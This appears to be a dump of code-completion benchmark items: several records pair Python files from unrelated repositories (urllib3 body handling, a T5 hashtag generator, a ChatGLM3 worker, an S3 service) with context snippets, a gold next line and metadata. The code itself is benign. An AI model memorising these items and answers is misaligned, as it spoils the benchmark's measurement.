Otherwise, we'll attempt to record a position for future use.
"""
if pos is not None:
rewind_body(body, pos)
elif getattr(body, "tell", None) is not None:
try:
pos = body.tell()
except OSError:
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body.
pos = _FAILEDTELL
return pos
def rewind_body(body: typing.IO[typing.AnyStr], body_pos: _TYPE_BODY_POSITION) -> None:
"""
Attempt to rewind body to a certain position.
Primarily used for request redirects and retries.
:param body:
File-like object that supports seek.
:param int pos:
Position to seek to in file.
"""
body_seek = getattr(body, "seek", None)
if body_seek is not None and isinstance(body_pos, int):
try:
body_seek(body_pos)
except OSError as e:
raise UnrewindableBodyError(
"An error occurred when rewinding request body for redirect/retry."
) from e
elif body_pos is _FAILEDTELL:
raise UnrewindableBodyError(
"Unable to record file position for rewinding "
"request body during a redirect/retry."
)
else:
raise ValueError(
f"body_pos must be of type integer, instead it was {type(body_pos)}."
)
class ChunksAndContentLength(typing.NamedTuple):
chunks: typing.Iterable[bytes] | None
content_length: int | None
def body_to_chunks(
body: typing.Any | None, method: str, blocksize: int
) -> ChunksAndContentLength:
"""Takes the HTTP request method, body, and blocksize and
transforms them into an iterable of chunks to pass to
socket.sendall() and an optional 'Content-Length' header.
A 'Content-Length' of 'None' indicates the length of the body
can't be determined so should use 'Transfer-Encoding: chunked'
for framing instead.
"""
chunks: typing.Iterable[bytes] | None
content_length: int | None
# No body, we need to make a recommendation on 'Content-Length'
# based on whether that request method is expected to have
# a body or not.
if body is None:
chunks = None
if method.upper() not in _METHODS_NOT_EXPECTING_BODY:
content_length = 0
else:
content_length = None
# Bytes or strings become bytes
elif isinstance(body, (str, bytes)): | chunks = (to_bytes(body),) | 1 | 2023-12-16 04:12:01+00:00 | 4k |
ict-bigdatalab/RIGHT | model.py | [
{
"identifier": "Twitter_THG",
"path": "get_datasets.py",
"snippet": "class Twitter_THG(Dataset):\n def __init__(self, tokenizer, args, mode):\n super(Twitter_THG, self).__init__()\n if mode == 'train':\n self.src_data_path = args.train_src_file\n self.dst_data_path = args.train_dst_file\n elif mode == 'val':\n self.src_data_path = args.val_src_file\n self.dst_data_path = args.val_dst_file\n elif mode == 'test':\n self.src_data_path = args.test_src_file\n self.dst_data_path = args.test_dst_file\n else:\n raise ValueError(\"please give mode in [train, val, test]\")\n\n if args.use_retrieval_augmentation:\n if mode == 'train':\n self.retrieval_index_path = args.retrieval_index_path_for_train\n elif mode == 'val':\n self.retrieval_index_path = args.retrieval_index_path_for_val\n elif mode == 'test':\n self.retrieval_index_path = args.retrieval_index_path_for_test\n self.retrieval_document_path = args.train_dst_file\n self.selector_result_path = None\n if args.use_selector_result:\n if mode == 'train':\n self.selector_result_path = args.selector_result_path_for_train\n elif mode == 'val':\n self.selector_result_path = args.selector_result_path_for_val\n elif mode == 'test':\n self.selector_result_path = args.selector_result_path_for_test\n self.tokenizer = tokenizer\n self.max_source_length = args.max_source_length\n self.max_target_length = args.max_target_length\n self.args = args\n\n self.inputs = []\n self.targets = []\n self._build_datasets()\n\n def __len__(self):\n return len(self.inputs)\n\n def __getitem__(self, index):\n source_ids = self.inputs[index][\"input_ids\"].squeeze()\n target_ids = self.targets[index][\"input_ids\"].squeeze()\n\n src_mask = self.inputs[index][\"attention_mask\"].squeeze() # might need to squeeze\n target_mask = self.targets[index][\"attention_mask\"].squeeze() # might need to squeeze\n\n return {\"source_ids\": source_ids, \"source_mask\": src_mask,\n \"target_ids\": target_ids, \"target_mask\": target_mask,\n \"src\": self.src[index], \"target\": self.tar_seq[index]}\n\n def _build_datasets(self):\n src, targets, hashtags = get_transformed_io(self.src_data_path, self.dst_data_path)\n if self.args.use_retrieval_augmentation:\n src = retrieval_augment(self.args, src, self.retrieval_index_path, self.retrieval_document_path, self.selector_result_path, top_k=5)\n self.src = src\n self.tar_seq = targets\n # vision_dataLen_distribution(src, self.tokenizer, \"input text distribution\")\n # vision_dataLen_distribution(targets, self.tokenizer, \"output text distribution\")\n for i in range(len(src)):\n input = src[i]\n tokenized_input = self.tokenizer(\n [input], max_length=self.max_source_length, padding=\"max_length\",\n truncation=True, return_tensors=\"pt\"\n )\n self.inputs.append(tokenized_input)\n\n target = targets[i]\n tokenized_target = self.tokenizer(\n [target], max_length=self.max_target_length, padding=\"max_length\",\n truncation=True, return_tensors=\"pt\"\n )\n self.targets.append(tokenized_target)"
},
{
"identifier": "extracte_hashtags_from_sequence",
"path": "eval_utils.py",
"snippet": "def extracte_hashtags_from_sequence(seq: str):\n seq = seq.strip()\n if seq == 'None':\n seq = ''\n hashtags = seq.split(SEP)\n hashtags = [ht.strip() for ht in hashtags]\n results = []\n for ht in hashtags:\n if ht != '' and ht not in results:\n results.append(ht)\n return results"
}
] | import torch
import torch.nn as nn
import argparse
from transformers import T5ForConditionalGeneration, T5Tokenizer, T5Config, AutoModelForSeq2SeqLM, MT5ForConditionalGeneration
from get_datasets import Twitter_THG
from torch.utils.data import DataLoader
from Template import SEP, MAP_SPETOKENS_IDS
from eval_utils import extracte_hashtags_from_sequence | 1,961 |
class GenerativeModel(nn.Module):
def __init__(self, args, tokenizer):
super().__init__()
self.args = args
self.tokenizer = tokenizer
if args.dataset == 'THG':
if args.load_pretrained_parameters:
self.model = T5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
else:
config = T5Config.from_pretrained(self.args.model_name_or_path)
self.model = AutoModelForSeq2SeqLM.from_config(config)
print(f"\nthe model is {self.args.model_name_or_path} from scratch")
elif args.dataset == 'WHG':
self.model = MT5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
def forward(self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, labels):
outputs = self.model(input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
labels=labels)
return outputs
def generate(self, batch, num_beams=1):
self.eval()
if self.args.dataset == 'WHG':
with torch.no_grad():
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
num_return_sequences=num_beams
)
decs = [self.tokenizer.decode(ids, skip_special_tokens=True) for ids in outputs]
dec = []
batch_size = len(batch['src'])
for bs in range(batch_size):
hashtag_str = ''
for d in range(bs * num_beams, (bs+1) * num_beams, 1):
hashtag_str = hashtag_str + decs[d] + ' ' + SEP + ' '
hashtag_str = hashtag_str[:(len(SEP) + 2) * (-1)].strip()
dec.append(hashtag_str)
else:
with torch.no_grad():
# if num_beams == 1:
# self.model._cache_input_ids = batch['source_ids'].to(self.args.device)
# else:
# expanded_return_idx = (
# torch.arange(batch['source_ids'].shape[0]).view(-1, 1).repeat(1, num_beams).view(-1).to(
# self.to(self.args.device))
# )
# input_ids = batch['source_ids'].index_select(0, expanded_return_idx)
# self.model._cache_input_ids = input_ids.to(self.args.device)
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
)
# decode outputs
sequences = outputs
dec = [self.tokenizer.decode(ids, skip_special_tokens=False, clean_up_tokenization_spaces=False) for ids in
sequences]
for d in range(len(dec)):
dec[d] = dec[d].replace('<pad>', '')
dec[d] = dec[d].replace('</s>', '').strip()
result = extracte_hashtags_from_sequence(dec[d])
dec[d] = ""
if len(result) == 0:
dec[d] = "None"
else:
for res in result:
dec[d] = dec[d] + res + " " + SEP + " "
dec[d] = dec[d][:(len(SEP) + 2) * (-1)].strip()
self.train()
# the shape is [batch_size, seq_len]
return dec
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", default="./PLM_checkpoint/t5-base", type=str)
parser.add_argument("--device", default='cpu', type=str,)
parser.add_argument("--max_target_length", default=100, type=int)
args = parser.parse_args()
tokenizer = T5Tokenizer.from_pretrained('PLM_checkpoint/t5-base')
model = GenerativeModel(args, tokenizer)
src_path = 'data/THG_twitter/twitter.2021.valid.src'
dst_path = 'data/THG_twitter/twitter.2021.valid.dst'
|
class GenerativeModel(nn.Module):
def __init__(self, args, tokenizer):
super().__init__()
self.args = args
self.tokenizer = tokenizer
if args.dataset == 'THG':
if args.load_pretrained_parameters:
self.model = T5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
else:
config = T5Config.from_pretrained(self.args.model_name_or_path)
self.model = AutoModelForSeq2SeqLM.from_config(config)
print(f"\nthe model is {self.args.model_name_or_path} from scratch")
elif args.dataset == 'WHG':
self.model = MT5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
def forward(self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, labels):
outputs = self.model(input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
labels=labels)
return outputs
def generate(self, batch, num_beams=1):
self.eval()
if self.args.dataset == 'WHG':
with torch.no_grad():
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
num_return_sequences=num_beams
)
decs = [self.tokenizer.decode(ids, skip_special_tokens=True) for ids in outputs]
dec = []
batch_size = len(batch['src'])
for bs in range(batch_size):
hashtag_str = ''
for d in range(bs * num_beams, (bs+1) * num_beams, 1):
hashtag_str = hashtag_str + decs[d] + ' ' + SEP + ' '
hashtag_str = hashtag_str[:(len(SEP) + 2) * (-1)].strip()
dec.append(hashtag_str)
else:
with torch.no_grad():
# if num_beams == 1:
# self.model._cache_input_ids = batch['source_ids'].to(self.args.device)
# else:
# expanded_return_idx = (
# torch.arange(batch['source_ids'].shape[0]).view(-1, 1).repeat(1, num_beams).view(-1).to(
# self.to(self.args.device))
# )
# input_ids = batch['source_ids'].index_select(0, expanded_return_idx)
# self.model._cache_input_ids = input_ids.to(self.args.device)
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
)
# decode outputs
sequences = outputs
dec = [self.tokenizer.decode(ids, skip_special_tokens=False, clean_up_tokenization_spaces=False) for ids in
sequences]
for d in range(len(dec)):
dec[d] = dec[d].replace('<pad>', '')
dec[d] = dec[d].replace('</s>', '').strip()
result = extracte_hashtags_from_sequence(dec[d])
dec[d] = ""
if len(result) == 0:
dec[d] = "None"
else:
for res in result:
dec[d] = dec[d] + res + " " + SEP + " "
dec[d] = dec[d][:(len(SEP) + 2) * (-1)].strip()
self.train()
# the shape is [batch_size, seq_len]
return dec
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", default="./PLM_checkpoint/t5-base", type=str)
parser.add_argument("--device", default='cpu', type=str,)
parser.add_argument("--max_target_length", default=100, type=int)
args = parser.parse_args()
tokenizer = T5Tokenizer.from_pretrained('PLM_checkpoint/t5-base')
model = GenerativeModel(args, tokenizer)
src_path = 'data/THG_twitter/twitter.2021.valid.src'
dst_path = 'data/THG_twitter/twitter.2021.valid.dst' | datasets = Twitter_THG(tokenizer, src_path, dst_path) | 0 | 2023-12-16 06:00:53+00:00 | 4k |
shell-nlp/gpt_server | gpt_server/model_worker/chatglm3.py | [
{
"identifier": "conv2messages",
"path": "gpt_server/model_handler/chatglm3.py",
"snippet": "def conv2messages(prompt):\n # 去除多余的换行符和空格\n prompt = prompt.strip()\n\n # 将提示模型转换为列表格式\n messages = []\n segments = prompt.split(\"<|\")\n for segment in segments[1:]:\n role, content = segment.split(\"|>\")\n messages.append({\"role\": role, \"content\": content.strip()})\n query = None\n for i, item in enumerate(messages):\n if item[\"role\"] == \"assistant\" and item[\"content\"] == \"\":\n query = messages[i - 1][\"content\"]\n messages = messages[: i - 1]\n break\n\n if query:\n return query, messages\n else:\n raise Exception(\"conv2messages 解析错误\")"
},
{
"identifier": "ModelWorkerBase",
"path": "gpt_server/model_worker/base.py",
"snippet": "class ModelWorkerBase(BaseModelWorker, ABC):\n def __init__(\n self,\n controller_addr: str,\n worker_addr: str,\n worker_id: str,\n model_path: str,\n model_names: List[str],\n limit_worker_concurrency: int,\n conv_template: str = None, # type: ignore\n model_type: str = \"AutoModel\",\n ):\n super().__init__(\n controller_addr,\n worker_addr,\n worker_id,\n model_path,\n model_names,\n limit_worker_concurrency,\n conv_template,\n )\n os.environ[\"WORKER_NAME\"] = self.__class__.__name__\n self.use_deepspeed = os.getenv(\"USE_DS\", 0)\n self.use_accelerate = os.getenv(\"USE_ACC\", 0)\n self.model_type = model_type\n self.model = None\n self.tokenizer = None\n self.load_model_tokenizer(model_path)\n self.context_len = self.get_context_length()\n logger.info(f\"Loading the model {self.model_names} on worker {worker_id} ...\")\n self.init_heart_beat()\n\n def get_context_length(\n self,\n ):\n \"\"\" \"支持的最大 token 长度\"\"\"\n if self.model is None:\n return 512\n return get_context_length(self.model.config)\n\n def get_model_class(self):\n MODEL_CLASS = AutoModel\n if self.model_type == \"LlamaForCausalLM\":\n MODEL_CLASS = LlamaForCausalLM\n register = AutoModelForCausalLM._model_mapping.register\n register(LlamaForCausalLM.config_class, LlamaForCausalLM, exist_ok=True)\n MODEL_CLASS = AutoModelForCausalLM\n\n elif self.model_type == \"AutoModel\":\n MODEL_CLASS = AutoModel\n elif self.model_type == \"AutoModelForCausalLM\":\n MODEL_CLASS = AutoModelForCausalLM\n\n return MODEL_CLASS\n\n @abstractmethod\n def load_model_tokenizer(self, model_path):\n \"\"\"加载 模型 和 分词器 直接对 self.model 和 self.tokenizer 进行赋值\"\"\"\n self.tokenizer = AutoTokenizer.from_pretrained(\n model_path,\n trust_remote_code=True,\n encode_special_tokens=True,\n )\n\n if self.use_accelerate and self.use_deepspeed:\n assert 0, \"ds 和 acc 不能同时设置为 True\"\n\n MODEL_CLASS = self.get_model_class()\n if not self.use_deepspeed and not self.use_accelerate:\n logger.info(\"使用hf\")\n self.model = MODEL_CLASS.from_pretrained(\n model_path,\n trust_remote_code=True,\n torch_dtype=torch.bfloat16,\n device_map=None if self.use_deepspeed else \"auto\",\n ).half()\n\n self.model = self.model.eval()\n\n if self.use_deepspeed:\n from gpt_server.model_backend.deepspeed_backend import get_ds_model\n\n logger.info(\"使用deepspeed\")\n ds_model = get_ds_model(model_path=model_path, model_class=MODEL_CLASS)\n self.model = ds_model\n if self.use_accelerate:\n from gpt_server.model_backend.accelerate_backend import get_acc_model\n\n logger.info(\"使用accelerate\")\n acc_model = get_acc_model(model_path=model_path, model_class=MODEL_CLASS)\n self.model = acc_model\n\n @abstractmethod\n def generate_stream_gate(self, params):\n pass\n\n def generate_gate(self, params):\n for x in self.generate_stream_gate(params):\n pass\n return json.loads(x[:-1].decode())\n\n @abstractmethod\n def get_embeddings(self, params):\n pass\n\n @classmethod\n def get_worker(\n cls,\n model_path: str,\n controller_addr: str = \"http://localhost:21001\",\n worker_addr: str = \"http://localhost:21002\",\n worker_id: str = str(uuid.uuid4())[:8],\n model_names: List[str] = [\"chatglm3-6b-2\"],\n limit_worker_concurrency: int = 6,\n conv_template: str = None, # type: ignore\n ):\n worker = cls(\n controller_addr,\n worker_addr,\n worker_id,\n model_path,\n model_names,\n limit_worker_concurrency,\n conv_template=conv_template,\n )\n return worker\n\n @classmethod\n def run(cls):\n import uvicorn\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gpus\", type=str, default=\"gpus\")\n\n parser.add_argument(\"--local_rank\", type=str, default=\"local-rank\") # 必传\n parser.add_argument(\"--master_port\", type=str, default=\"master_port\")\n parser.add_argument(\n \"--model_name_or_path\", type=str, default=\"model_name_or_path\"\n )\n parser.add_argument(\n \"--model_names\", type=lambda s: s.split(\",\"), default=\"model_names\"\n )\n\n args = parser.parse_args()\n use_deepspeed = os.getenv(\"USE_DS\", 0)\n if use_deepspeed:\n print(\"local-rank\", args.local_rank)\n print(\"master_port\", args.master_port)\n os.environ[\"Local_RANK\"] = args.local_rank\n os.environ[\"MASTER_PORT\"] = args.master_port\n # DS 只能在内部生效\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n\n host = \"localhost\"\n port = get_free_tcp_port()\n worker_addr = f\"http://{host}:{port}\"\n worker = cls.get_worker(\n worker_addr=worker_addr,\n model_path=args.model_name_or_path,\n model_names=args.model_names,\n conv_template=\"chatglm3\", # TODO 默认是chatglm3用于统一处理\n )\n if args.local_rank == \"0\":\n print(\"=======================================\")\n print(f\"{args.model_names[0]} 启动成功!\")\n print(\"=======================================\")\n uvicorn.run(app, host=host, port=port)"
}
] | import json
import torch
from typing import List
from fastchat.constants import ErrorCode, SERVER_ERROR_MSG
from transformers.generation.logits_process import LogitsProcessor
from gpt_server.model_handler.chatglm3 import conv2messages
from gpt_server.model_worker.base import ModelWorkerBase | 1,835 |
class InvalidScoreLogitsProcessor(LogitsProcessor):
def __call__(
self, input_ids: torch.LongTensor, scores: torch.FloatTensor
) -> torch.FloatTensor:
if torch.isnan(scores).any() or torch.isinf(scores).any():
scores.zero_()
scores[..., 5] = 5e4
return scores
invalid_score_processor = InvalidScoreLogitsProcessor()
|
class InvalidScoreLogitsProcessor(LogitsProcessor):
def __call__(
self, input_ids: torch.LongTensor, scores: torch.FloatTensor
) -> torch.FloatTensor:
if torch.isnan(scores).any() or torch.isinf(scores).any():
scores.zero_()
scores[..., 5] = 5e4
return scores
invalid_score_processor = InvalidScoreLogitsProcessor()
| class ChatGLM3Worker(ModelWorkerBase): | 1 | 2023-12-16 07:43:28+00:00 | 4k |
ilyamiro/Stewart | Core/Core.py | [
{
"identifier": "Synthesizer",
"path": "Audio/synthesizer.py",
"snippet": "class Synthesizer:\n \"\"\"\n Class for synthesizing Stewart voice\n Based on silero-tts v4 model from https://github.com/snakers4/silero-models\n \"\"\"\n\n def __init__(self, speaker=\"eugene\"):\n \"\"\"\n Synthesizer initializing\n :param speaker: One of eugene; kseniya; baya; xenia; aidar; random;\n \"\"\"\n # initialize pygame for playing audio\n self.audio_init()\n\n # initialize sample rate and the speaker_voice\n\n self.sample_rate = 48000\n self.speaker = speaker\n\n # initialization for torch package\n self.device = torch.device(\"cpu\")\n torch.set_num_threads(32)\n\n # downloading model from source\n self.local_file = \"model.pt\"\n self.download_model()\n\n # creating model\n self.model = torch.package.PackageImporter(\n f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/model.pt\").load_pickle(\"tts_models\",\n \"model\")\n self.model.to(self.device)\n synthesis_logger.info(\"Model has beed set\")\n\n # setting audio state checker for synthesizer\n self.audio = PlayChecker()\n\n self.music_playing = False\n self.music_stopped = True\n\n def download_model(self, url=\"https://models.silero.ai/models/tts/ru/v4_ru.pt\"):\n \"\"\"\n Function for downloading voice model\n :param url: address for downloading voice model\n \"\"\"\n # downloading model from source\n if not os.path.isfile(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/model.pt\"):\n synthesis_logger.info(\"Downloading synthesis model\")\n torch.hub.download_url_to_file(url, self.local_file)\n\n @staticmethod\n def audio_init():\n \"\"\"\n Function for initializing pygame audio player\n\n \"\"\"\n pygame.init()\n pygame.mixer.init()\n synthesis_logger.debug(\"Audio initialized\")\n\n def say(self, text: str) -> None:\n \"\"\"\n Function for saying something\n :param text: text for saying\n :return: None\n \"\"\"\n self.synthesize(text)\n # playing audio from file using pygame.\n # playsound() could be used instead, but it doesn't really imply stop() func, while pygame does\n try:\n pygame.mixer.music.load(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/audio.wav\")\n pygame.mixer.music.play()\n except pygame.error:\n synthesis_logger.error(\"Audio playing error\")\n\n def synthesize(self, text: str) -> None:\n if self.music_stopped:\n # synthesizing voice\n try:\n self.model.save_wav(ssml_text=f\"<speak><prosody rate='100%'>{text}</prosody></speak>\",\n speaker=self.speaker,\n\n sample_rate=self.sample_rate,\n audio_path=f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Audio/audio.wav\") # ssml text supports a lot of parameters, such as intonation, pauses etc.\n except AssertionError:\n raise SpeakerInvalid\n except Exception:\n raise SynthesisError\n\n @staticmethod\n def is_saying() -> bool:\n \"\"\"\n Function for checking if synthesized audio is being played\n :return: checks if stewart is saying something. Returns True if yes, else False\n \"\"\"\n return pygame.mixer.music.get_busy()\n\n def change_speaker(self, speaker: str):\n \"\"\"\n Function for changing voice model's speaker\n :param speaker: speaker name. One of eugene; kseniya; baya; xenia; aidar; random;\n \"\"\"\n self.speaker = speaker\n\n def change_sample_rate(self, rate: int):\n \"\"\"\n Function for changing voice model's rate\n :param rate: rate of a synthesizer model\n\n \"\"\"\n self.sample_rate = rate"
},
{
"identifier": "Voice",
"path": "Audio/recognition.py",
"snippet": "class Voice:\n \"\"\"\n Class for recognizing user's voice\n All models taken from: https://alphacephei.com/vosk/models\n\n Usage example\n\n voice = Voice()\n voice.start_stream()\n while True:\n for word in voice.listen():\n print(word)\n\n \"\"\"\n\n def __init__(self, lang=\"ru\", big_model=False):\n # if platform == \"linux\" or platform == \"linux2\":\n # # on some linux systems, jack_control is disabled on boot, and audio input is not working properly\n # # if there is another audio input driver controller, it should be enabled itself\n # os.system(\"jack_control start\")\n self.rate = 16000\n self.init_model(lang, big_model)\n self.init_audio(16000)\n self.init_recognizer()\n\n def listen(self):\n \"\"\"\n Generator for handling user input.\n Reads data from stream and uses recognizer to analyze the data\n\n \"\"\"\n data = self.stream.read(4000, exception_on_overflow=False)\n # checking if data is valid\n if self.recognizer.AcceptWaveform(data) and len(data) > 1 and self.stream.is_active():\n # using json to load results of user input's analyzing\n answer = json.loads(self.recognizer.Result())\n # if user said something - it yields\n if answer['text']:\n # recognition_logger.info(\"Data readed and analyzed\")\n yield answer['text']\n\n def init_model(self, model_lang=\"ru\", big_model: bool = False):\n \"\"\"\n :param model_lang: choose model's language: ru/en\n :param big_model: choose if the model is going to be big or not. ->\n\n Big models can take up to 8 Gb of RAM on your device, so using them might not be optimal for you\n Small models are mainly used for Android/IOS apps, they are much easier to handle,\n but they are worse at voice detection.\n\n \"\"\"\n # default model path\n model_path = f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Speech-models/vosk-model-small-ru-0.22\"\n\n # choosing model depending on user's choice\n if model_lang == \"ru\":\n model_path = f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Speech-models/vosk-model{'-small' if not big_model else ''}-ru-{'0.42' if big_model else '0.22'}\"\n elif model_lang == \"en\":\n model_path = f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Speech-models/vosk-model{'-small' if not big_model else ''}-en-us-{'0.22' if big_model else '0.15'}\"\n # initializing the model\n\n self.model = Model(model_path)\n recognition_logger.info(\"Model initialized\")\n\n def init_audio(self, rate):\n \"\"\"\n Function for initializing pyaudio stream\n :param rate: the quality of audio coming from your microphone into the system.\n rate from 16000 to 48000 doesn't really change model's behavior\n \"\"\"\n\n p = pyaudio.PyAudio()\n self.rate = rate\n\n try:\n # the number of frames per buffer should preferably be half the rate value\n self.stream = p.open(format=pyaudio.paInt16, rate=rate, channels=1, frames_per_buffer=int(rate / 2), input=True)\n recognition_logger.info(\"stream created\")\n except TypeError:\n raise StreamParametersError(\"Stream parameters (rate) are corrupted. Failed to open stream\")\n\n def init_recognizer(self):\n \"\"\"\n Function for initializing recognizer\n \"\"\"\n try:\n self.recognizer = KaldiRecognizer(self.model, self.rate)\n recognition_logger.info(\"Recognizer initialized\")\n except AttributeError:\n recognition_logger.error(\"Model error\")\n raise ModelError(\"There was an error initializing this model\")\n\n\n def start_stream(self):\n \"\"\"\n Start voice input\n \"\"\"\n self.stream.start_stream()\n recognition_logger.info(\"stream started\")\n\n def stop_stream(self):\n \"\"\"\n Stop voice input\n \"\"\"\n self.stream.stop_stream()\n recognition_logger.info(\"stream stopped\")\n\n\n def is_enabled(self):\n \"\"\"\n Function for checking if the voice input is active\n \"\"\"\n return self.stream.is_active()"
},
{
"identifier": "Data",
"path": "Database/Data.py",
"snippet": "class Data:\n \"\"\"\n class for data handling\n \"\"\"\n def __init__(self):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/data.json\", \"r\") as file:\n data = json.load(file)\n for key in data.keys():\n self.__setattr__(key, data[key])"
},
{
"identifier": "PluginOperation",
"path": "PluginSystem/Plugin_system.py",
"snippet": "class PluginOperation:\n @staticmethod\n def register_plugin(plugin: Plugin):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n __info__ = asdict(plugin.info)\n if __info__ not in data[\"plugins\"] and os.path.exists(\n f'{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/{__info__[\"path\"]}'):\n data[\"plugins\"].append(__info__)\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"w\") as file:\n json.dump(data, file, ensure_ascii=False)\n plugin_system_logger.info(f\"Plugin {__info__['name']} has been registered\")\n else:\n plugin_system_logger.info(f\"Plugin {__info__['name']} is already registered\")\n\n @staticmethod\n def __check_plugin__(name: str, check: str):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n for plugin in data[\"plugins\"]:\n if plugin[\"name\"] == name:\n prm = plugin[check]\n plugin_system_logger.info(f\"Plugin's named {name} parameter {check} is equal to {prm}\")\n return prm\n\n @staticmethod\n def unregister_plugin(name: str):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n for plugin in data[\"plugins\"]:\n if plugin[\"name\"] == name:\n data[\"plugins\"].remove(plugin)\n break\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"w\") as file:\n json.dump(data, file, ensure_ascii=False)\n plugin_system_logger.debug(f\"Plugin {name} was successfully unregistered\")\n\n @staticmethod\n def __plugin_load__(name):\n with open(f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/Database/config.json\", \"r\") as file:\n data = json.load(file)\n plugin_info = None\n for go in data[\"plugins\"]:\n if go[\"name\"] == name:\n plugin_info = go\n plugin_system_logger.info(f\"Plugin {plugin_info['name']} is going to be loaded to the core\")\n break\n if plugin_info:\n spec = importlib.util.spec_from_file_location(\"main\",\n f\"{os.path.abspath(os.path.join(os.getcwd(), os.pardir))}/{plugin_info['path']}/main.py\")\n plugin_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(plugin_module)\n return plugin_module.Main\n else:\n plugin_system_logger.error(\"Plugin not found\")"
},
{
"identifier": "PluginInfo",
"path": "PluginSystem/Plugin_system.py",
"snippet": "class PluginInfo:\n name: str\n author: str\n type: str\n path: str\n platform: str\n about: str"
},
{
"identifier": "core_logger",
"path": "LogSystem/Loggers.py",
"snippet": "class BaseLogger(Logger):\n def __init__(self, name, level=logging.NOTSET, ):\n def _setup_logger(self):"
}
] | import json
import os
import random
import threading
import pyautogui
import importlib.util
from Audio.synthesizer import Synthesizer
from Audio.recognition import Voice
from Database.Data import Data
from PluginSystem.Plugin_system import PluginOperation, PluginInfo
from Command_System import *
from LogSystem import core_logger | 3,011 |
pyautogui.FAILSAFE = False
class Core:
def __init__(self):
|
pyautogui.FAILSAFE = False
class Core:
def __init__(self): | core_logger.debug("Core execution started") | 5 | 2023-12-16 12:24:15+00:00 | 4k |
djkcyl/ABot-NT | utils/text2image.py | [
{
"identifier": "AdvertisementCategory",
"path": "models/ad.py",
"snippet": "class AdvertisementCategory(str, Enum):\n business = \"商业\"\n public_welfare = \"公益\"\n announcement = \"公告\"\n tips = \"提示\""
},
{
"identifier": "AiohttpClientService",
"path": "services/aiohttp.py",
"snippet": "class AiohttpClientService(Service):\n id = \"http.client/aiohttp\"\n session: ClientSession\n\n def __init__(self, session: ClientSession | None = None) -> None:\n self.session = cast(ClientSession, session)\n super().__init__()\n\n @property\n def stages(self) -> set[str]:\n return {\"preparing\", \"cleanup\"}\n\n @property\n def required(self) -> set:\n return set()\n\n async def launch(self, _: Launart) -> None:\n async with self.stage(\"preparing\"):\n if self.session is None:\n self.session = ClientSession(timeout=ClientTimeout(total=None))\n async with self.stage(\"cleanup\"):\n await self.session.close()"
},
{
"identifier": "S3FileService",
"path": "services/s3file.py",
"snippet": "class S3FileService(Service):\n id: str = \"abot/s3file\"\n\n def __init__(\n self,\n endpoint: str = \"127.0.0.1:8333\",\n access_key: str | None = None,\n secret_key: str | None = None,\n *,\n secure: bool = False,\n ) -> None:\n super().__init__()\n self.s3file = S3File(endpoint, access_key, secret_key, secure=secure)\n\n # def get_interface(self, _) -> Minio:\n # return self.s3file\n\n @property\n def required(self) -> set:\n return set()\n\n @property\n def stages(self) -> set[str]:\n return {\"preparing\"}\n\n async def launch(self, _: Launart) -> None:\n async with self.stage(\"preparing\"):\n if await self.s3file.bucket_exists(\"abot7f8befa44d10\"):\n logger.info(\"S3 Bucket 已存在\")\n else:\n logger.info(\"正在创建 S3 Bucket\")\n await self.s3file.make_bucket(\"abot7f8befa44d10\")\n logger.success(\"S3 Bucket 创建成功\")\n\n test_text = secrets.token_hex(16).encode()\n if await self.s3file.object_exists(\".keep\"):\n await self.s3file.remove_object(\".keep\")\n put_test = await self.s3file.put_object(\".keep\", test_text)\n if put_test:\n logger.info(\"S3 Bucket 可写\")\n else:\n logger.error(\"S3 Bucket 不可写\")\n msg = \"S3 Bucket 不可写\"\n raise S3FileError(msg)\n read_test: ClientResponse = await 